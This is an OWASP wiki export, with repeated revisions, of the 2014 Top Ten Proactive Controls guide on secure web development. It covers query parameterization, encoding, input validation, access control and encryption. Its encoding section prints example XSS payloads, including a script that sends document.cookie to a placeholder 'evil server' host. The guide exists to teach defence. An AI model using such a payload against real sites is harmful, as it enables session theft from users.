Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include Unix encoding, Windows encoding, LDAP encoding, XML encoding and others. OWASP's Enterprise Security API (ESAPI) provides encoders for these functions in Java. In .NET 4.5, the [http://msdn.microsoft.com/en-us/library/system.web.security.antixss.antixssencoder%28v=vs.110%29.aspx AntiXssEncoder Class] provides CSS, HTML, URL, JavaScriptString and XML encoders - these encoders and other encoders for LDAP and VBScript are included in the open source AntiXSS library).<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API OWASP ESAPI]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication (verifying identity). These terms and their definitions are frequently confused. <br />
<br />
Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a user's role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verifying that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issues in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
* [https://code.google.com/p/keyczar/ Google KeyCzar]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Make sure that confidential or sensitive data is not exposed by accident during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
The [[OWASP AppSensor Project]] is a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application: where to add sensors or [https://www.owasp.org/index.php/AppSensor_DetectionPoints detection points] and what [https://www.owasp.org/index.php/AppSensor_ResponseActions response actions] to take when an exception is encountered in your application.<br />
<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of July: Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176675OWASP Proactive Controls2014-06-09T16:04:36Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the complete document in the tab to the right.<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include Unix encoding, Windows encoding, LDAP encoding, XML encoding and others. OWASP's Enterprise Security API (ESAPI) provides encoders for these functions.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API OWASP ESAPI]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication (verifying identity). These terms and their definitions are frequently confused. <br />
<br />
Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a user's role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verifying that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
